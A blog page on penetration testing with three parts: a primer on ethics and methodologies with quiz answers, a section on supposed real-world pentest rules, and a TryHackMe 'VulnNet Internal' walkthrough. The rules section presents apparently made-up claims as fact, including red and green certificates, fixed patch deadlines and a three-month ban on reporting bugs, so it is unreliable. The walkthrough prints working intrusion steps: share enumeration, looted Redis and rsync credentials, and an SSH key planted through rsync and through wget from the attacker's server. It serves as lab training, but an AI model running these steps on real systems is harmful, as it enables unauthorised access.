What is Penetration Testing?

Learn the important ethics and methodologies behind every pentest.
 

Before teaching you the technical hands-on aspects of ethical hacking, you'll need to understand more about what a penetration tester's job responsibilities are and what processes are followed in performing pentests (finding vulnerabilities in a clients application or system).


The importance and relevancy of cybersecurity are ever-increasing and can be in every walk of life. News headlines fill our screens, reporting yet another hack or data leak. Penetration Testing Fundamentals


Cybersecurity is relevant to all people in the modern world, including a strong password policy to protect your emails or to businesses and other organisations needing to protect both devices and data from damages.


A Penetration test or pentest is an ethically-driven attempt to test and analyse the security defences to protect these assets and pieces of information. A penetration test involves using the same tools, techniques, and methodologies that someone with malicious intent would use and is similar to an audit.


According to Security Magazine, a cybersecurity industry magazine, there are over 2,200 cyber attacks every day - 1 attack every 39 seconds.

Penetration Testing Ethics

 
The battle of legality and ethics in cybersecurity, let alone penetration testing is always controversial. Labels like "hacking" and "hacker" often hold negative connotations, especially in pop culture, thanks to a few bad apples. The idea of legally gaining access to a computer system is a challenging concept to grasp -- after all, what makes it legal exactly?

Recall that a penetration test is an authorised audit of a computer system's security and defences as agreed by the owners of the systems. The legality of penetration is pretty clear-cut in this sense; anything that falls outside of this agreement is deemed unauthorised.

Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.

Companies that provide penetration testing services are held against legal frameworks and industry accreditation. For example, the National Cyber Security Centre (NCSC) has the CHECK accreditation scheme in the UK. This check means that only "[CHECK]  approved companies can conduct authorised penetration tests of public sector and CNI systems and networks." (NCSC).

Ethics is the moral debate between right and wrong; where an action may be legal, it may go against an individual's belief system of right and wrong.

Penetration testers will often be faced with potentially morally questionable decisions during a penetration test. For example, they are gaining access to a database and being presented with potentially sensitive data. Or they are, perhaps, performing a phishing attack on an employee to test an organisation's human security. If that action has been agreed upon during the initial stages, it is legal -- however ethically questionable.

Hackers are sorted into three hats, where their ethics and motivations behind their actions determine what hat category they are placed into. Let's cover these three in the table below:

Rules of Engagement (ROE)

The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections (explained in the table below), which are ultimately responsible for deciding how the engagement is carried out. The SANS institute has a great example of this document which you can view online here.

1) You are given permission to perform a security audit on an organisation; what type of hacker would you be?

Ans- White Hat



2) You attack an organisation and steal their data, what type of hacker would you be?

Ans- Black Hat



3) What document defines how a penetration testing engagement should be carried out?

Ans- Rules of Engagement


 

Penetration Testing Methodologies

Penetration tests can have a wide variety of objectives and targets within scope. Because of this, no penetration test is the same, and there are no one-case fits all as to how a penetration tester should approach it.

The steps a penetration tester takes during an engagement is known as the methodology. A practical methodology is a smart one, where the steps taken are relevant to the situation at hand. For example, having a methodology that you would use to test the security of a web application is not practical when you have to test the security of a network.


Before discussing some different industry-standard methodologies, we should note that all of them have a general theme of the following stages:
 

OSSTMM

The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.


The methodology focuses primarily on how these systems, applications communicate, so it includes a methodology for:

• Telecommunications (phones, VoIP, etc.)
• Wired Networks
• Wireless communications

OWASP

The "Open Web Application Security Project" framework is a community-driven and frequently updated framework used solely to test the security of web applications and services.


The foundation regularly writes reports stating the top ten security vulnerabilities a web application may have, the testing approach, and remediation.
   
    

NIST Cybersecurity Framework 1.1

The NIST Cybersecurity Framework is a popular framework used to improve an organisations cybersecurity standards and manage the risk of cyber threats. This framework is a bit of an honourable mention because of its popularity and detail.


The framework provides guidelines on security controls & benchmarks for success for organisations from critical infrastructure (power plants, etc.) all through to commercial.  There is a limited section on a standard guideline for the methodology a penetration tester should take.


 

NCSC CAF

The Cyber Assessment Framework (CAF) is an extensive framework of fourteen principles used to assess the risk of various cyber threats and an organisation's defences against these.


The framework applies to organisations considered to perform "vitally important services and activities" such as critical infrastructure, banking, and the likes. The framework mainly focuses on and assesses the following topics:

•     Data security
•     System security
•     Identity and access control
•     Resiliency
•     Monitoring
•     Response and recovery planning

1) What stage of penetration testing involves using publicly available information?

Ans- Information Gathering




2) If you wanted to use a framework for pentesting telecommunications, what framework would you use? Note: We're looking for the acronym here and not the full name.

Ans- OSSTMM



3) What framework focuses on the testing of web applications?

Ans- OWASP



 

Black box, White box, Grey box Penetration Testing



There are three primary scopes when testing an application or service. Your understanding of your target will determine the level of testing that you perform in your penetration testing engagement. In this task, we'll cover these three different scopes of testing.

Black-Box Testing

This testing process is a high-level process where the tester is not given any information about the inner workings of the application or service.


The tester acts as a regular user testing the functionality and interaction of the application or piece of software. This testing can involve interacting with the interface, i.e. buttons, and testing to see whether the intended result is returned. No knowledge of programming or understanding of the programme is necessary for this type of testing.


Black-Box testing significantly increases the amount of time spent during the information gathering and enumeration phase to understand the attack surface of the target.

Grey-Box Testing

This testing process is the most popular for things such as penetration testing. It is a combination of both black-box and white-box testing processes. The tester will have some limited knowledge of the internal components of the application or piece of software. Still, it will be interacting with the application as if it were a black-box scenario and then using their knowledge of the application to try and resolve issues as they find them.


With Grey-Box testing, the limited knowledge given saves time, and is often chosen for extremely well-hardened attack surfaces.

White-Box Testing

This testing process is a low-level process usually done by a software developer who knows programming and application logic. The tester will be testing the internal components of the application or piece of software and, for example, ensuring that specific functions work correctly and within a reasonable amount of time.


The tester will have full knowledge of the application and its expected behaviour and is much more time consuming than black-box testing. The full knowledge in a White-Box testing scenario provides a testing approach that guarantees the entire attack surface can be validated.

   
    

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

So guys, todays blog is very important and informative. Today's topic is what actually happens in a real life penetration testing.

There are so much rules and regulations for a beginner pen tester in a company. So in today's blog, I will share the steps which you have to follow while doing a pen test.

What are the steps when you work in a real company as pen tester ? So, if you want to read this blog till the end. Let's begin.

Firstly a proper aggrement is made defining you scope which contains what you can do and what you can't.

Company may specify that you can't use automated tools and sometimes you have exploit mannually No restriction on programming, you can make any programme and you can use it. 

Now a interesting thing, if you run a pen testing company and doing a pen testing engagement, your client can't change or deploy anything and this is the part of the rule. Suppose you have found all the vulnerabilities and made a proper report, the pen testing company will submit their client a red card. 

This is basically a red certificate saying that they have completed the pen test and submited the report. After that, client has 30 days to fix all the vulnerabilities. When it get fixed, the client will inform the pen test company. The pen testing company will again test the client's server using the same methods as before. If all the vulnerablilities get pached, the pen test company will issue a green certificate.


Now, lets come to rules. This specificly for Europian countries. A GDPR list is there to mesaure all the rate of vulnerabilities, so if somehow employe's data get leaked, government will charge the company and incase of any critical vulnerablities found, the company will have to do a pen test again in 2 months. This rule is for Europian countries.

Click Here 

 

Hope you remember I told you, once a pen test is done, client has only 1 months to patch all the vulnerablities. If client doesn't response in that time, and if the pen test company finds a new bug on the 31st day, they will charge client company. thats a rule too. 

Now if pen test is done and a bug is found within the 3 months of the previous pen test, they can't submit it, otherwise they will face legal consiquences. Because, if a new bug comes out within 3 months, it is considered that they knew it but didn't disclosed it. Thus legal problems can occur. There is a discloser policy where you can not share any pen test report within 3 months. You can not share anything regarding it. So many rules are there. It totaly depends countrywise and companywise.

Hope you liked today's blog and don't forget to share. You can't find these type of blog anywhere else. Its a very unknown topic. I would also like to give a big shoutout to Trident Security.

Disclaimer

The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe VulnNet Internal As a Penetration Testing


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

VulnNet Entertainment learns from its mistakes, and now they have something new for you...TryHackMe VulnNet Internal As a Penetration Testing

We start of my driving of tryhackme this room a quick scan on all ports using threader300 and simultaneously running nmap service scan to cover the top ports

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.155.145
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Scanning 10.10.155.145 [65535 ports]
Discovered open port 111/tcp on 10.10.155.145
Discovered open port 22/tcp on 10.10.155.145
Discovered open port 139/tcp on 10.10.155.145
Discovered open port 445/tcp on 10.10.155.145
Discovered open port 45811/tcp on 10.10.155.145
Discovered open port 51665/tcp on 10.10.155.145
Discovered open port 57017/tcp on 10.10.155.145
Discovered open port 39557/tcp on 10.10.155.145
Discovered open port 2049/tcp on 10.10.155.145
Discovered open port 6379/tcp on 10.10.155.145
Discovered open port 873/tcp on 10.10.155.145
Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
Nmap scan report for 10.10.155.145
Host is up, received user-set (0.21s latency).
Scanned at 2021-05-10 19:10:58 IST for 561s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      40068/udp6  mountd
|   100005  1,2,3      51665/tcp   mountd
|   100005  1,2,3      51843/tcp6  mountd
|   100005  1,2,3      56229/udp   mountd
|   100021  1,3,4      39572/udp6  nlockmgr
|   100021  1,3,4      39935/tcp6  nlockmgr
|   100021  1,3,4      45811/tcp   nlockmgr
|   100021  1,3,4      48120/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
9090/tcp  filtered zeus-admin  no-response
39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
           Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -p 445  --script=smb-enum-shares.nse, smb-enum-users.nse  10.10.155.145   130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
Failed to resolve "smb-enum-users.nse".
Nmap scan report for 10.10.155.145
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.155.145\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.155.145\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\10.10.155.145\shares: 
|     Type: STYPE_DISKTREE
|     Comment: VulnNet Business Shares
|     Users: 0
|     Max Users: 
|     Path: C:\opt\shares
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$                                                       

so, after observing the whole nmap output process we decide that we need to enumerate serveral ports, otherwise we will enumerate with SMB.


SMB Enumeration: 138 & 445

so we will use enum4linux tool in our machine with vulnerable macine IP

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ enum4linux 10.10.155.145                                                   
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.155.145
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none



 ========================================== 
|    Share Enumeration on 10.10.155.145    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.155.145
//10.10.155.145/print$  Mapping: DENIED, Listing: N/A
//10.10.155.145/shares  Mapping: OK, Listing: OK
//10.10.155.145/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    www.kumaratuljaiswal.in www.hackingtruth.in     |
 ===================================================== 


enum4linux complete on Mon May 10 19:27:33 2021

                                                                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ 

I can connect to shares without supplying a password

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ sudo smbclient //10.10.155.145/shares                                                 1 ⨯
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.            
smb: \> ls

  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275872 blocks available

smb: \> cd temp
smb: \temp\> ls

  services.txt                        N       38  Sat Feb  6 17:15:09 2021

                11309648 blocks of size 1024. 3275872 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) 
smb: \temp\> cd ..
smb: \> ls

  temp                                D        0  Sat Feb  6 17:15:10 2021
  data                                D        0  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \> cd data
smb: \data\> ls

  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \data\> ls

  data.txt                            N       48  Tue Feb  2 14:51:18 2021
  business-req.txt                    N      190  Tue Feb  2 14:57:33 2021

                11309648 blocks of size 1024. 3275868 blocks available
smb: \data\> cd 
smb: \> pwd
Current directory is \\10.10.155.145\shares\
smb: \> exit
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]

Browsing whole around the SMB services, only one file contains useful information, the services.txt

so, as you can see... downloading and reading this file I find the first flag

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat services.txt    
THM{0a09d51e488f5fa105d8d866a497440a}
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat data.txt    
Purge regularly data that is not needed anymore
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$                          

I also found NFS open, so I can look to see if I can mount to anything

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo showmount -e 10.10.155.145               
Export list for 10.10.155.145:
/opt/conf *
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

Exploit

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir conf            
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ cd conf  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ ls
hp  init  opt  profile.d  redis  vim  wildmidi
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
└─$ cd redis 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$    

Enumerating the share, we quickly dive down to the Redis directory to find notable information in the redis.conf file..(save this password anywhere)

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ ls
redis.conf
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ cat redis.conf 
# Redis configuration file example.
#

# If the master is password protected (using the "requirepass" configuration
# directive below) it is possible to tell the slave to authenticate before
# starting the replication synchronization process, otherwise the master will
# refuse the slave request.
#
# masterauth 

requirepass "B65Hx562F@ggAZ@F"
#
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
└─$ 

REDIS Enumeration : 6379

REDIS the Remote Dictionary Server is an in-memory database we could enumerate Redis with either Netcat, MSF auxiliary scanner or Redis-cli

 

But first you need to install redis-cli in your linux & whatever you have..

apt-get insall redis-tool

using Redis-cli which the best in my opinion we connect to the Redis server using the credentials we found in the mount earlier then query it for the list and content of database it holds

I found a redis password, so I can use this to login to the open redis port

hello myself kumar atul jaiswal and i am a cyber security specialist

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> get "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
10.10.155.145:6379> 
                                

Once again, after trying different commands, I was finally able to access the authlist.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.155.145:6379> keys *
1) "marketlist"
2) "tmp"
3) "internal flag"
4) "int"
5) "authlist"
10.10.155.145:6379> type authlist
list                                                                                                                                            
10.10.155.145:6379> lrange authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                           
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
10.10.155.145:6379> 

Decoding the cypher

From the look of it, we can tell that it's encoded in base64. Let's decode it.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d 
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ 

This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.

Enumerating rsync

A quick refresher using --help shows us the switches we need to use.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av --list-only rsync://10.10.155.145:873
files           Necessary home interaction
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

Creating a folder and copying the files

Browsing the directory, we can find user.txt. Other than that, there isn't anything useful here, except for the username. Now we can try to upload a public ssh key to the server and ssh into it.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ mkdir files                                                                                                                  10 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync                                                              10 ⨯
Password: 
receiving incremental file list
created directory ./rsync
./
sys-internal/
sys-internal/.bashrc
sys-internal/.rediscli_history -> /dev/null
sys-internal/.sudo_as_admin_successful
sys-internal/.xsession-errors.old
sys-internal/user.txt

I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file to .ssh that I made so I can login through SSH. To start, I create the keys on my local system

without pass

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh-keygen -f ./id_rsa                                                             
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|                 |
|                 |
|   . .           |
|. + = . S        |
| o B   o+..      |
|  o + *=.*..     |
|  .+ X+B@ooo.    |
| oo.O+O@+=E.     |
+----[SHA256]-----+
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

With this created, I change the named of id_rsa.pub to authorized_keys then upload the file.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls                                                                                                                                    
id_rsa  id_rsa.pub  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo cp id_rsa.pub authorized_keys                                                 
[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ls
authorized_keys id_rsa  id_rsa.pub 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$

with this password Hcg3HP67@TW@Bc72v

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
Password: 
sending incremental file list
id_rsa.pub

sent 674 bytes  received 35 bytes  18.42 bytes/sec
total size is 580  speedup is 0.82
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

Other Method for Uploading a File

with python3 we are doing a file transfer with this command

python3 -m http.server 1234

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ python3 -m http.server 1234                                                                                                            10 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
^C  
Keyboard interrupt received, exiting.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

then go to in our browser and type in the search bar 10.8.61.234:1234 (with own IP and port which is used to above the command). 

and download in vulnerable machine(sys-internal@vulnet-internal) via wget command. (Note - wget tool already installed in sys-internal machine except curl)

sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
--2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
Connecting to 10.8.61.234:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 580 [application/octet-stream]
Saving to: ‘authorized_keys.1’

authorized_keys                 100%[===========================================================>]     580  --.-KB/s    in 0s      

2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]

sys-internal@vulnnet-internal:~/.ssh$ ls
authorized_keys  authorized_keys
sys-internal@vulnnet-internal:~/.ssh$ 

I can now login as sys-internal through SSH in our machine.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ ssh -i id_rsa sys-internal@10.10.155.145
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
sys-internal@vulnnet-internal:~$ whoami
sys-internal
sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
sys-internal@vulnnet-internal:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
sys-internal@vulnnet-internal:~$ 

Privilege Escalation

Manually enumerating, I find a directory under / named TeamCity. Looking at this, I see it is running a webserver

and

cat TeamCity-readme.txt

sys-internal@vulnnet-internal:~$ cd /TeamCity
sys-internal@vulnnet-internal:/TeamCity$ ls
bin          buildAgent  devPackage  licenses  service.properties   temp                webapps
BUILD_85899  conf        lib         logs      TeamCity-readme.txt  Tomcat-running.txt  work
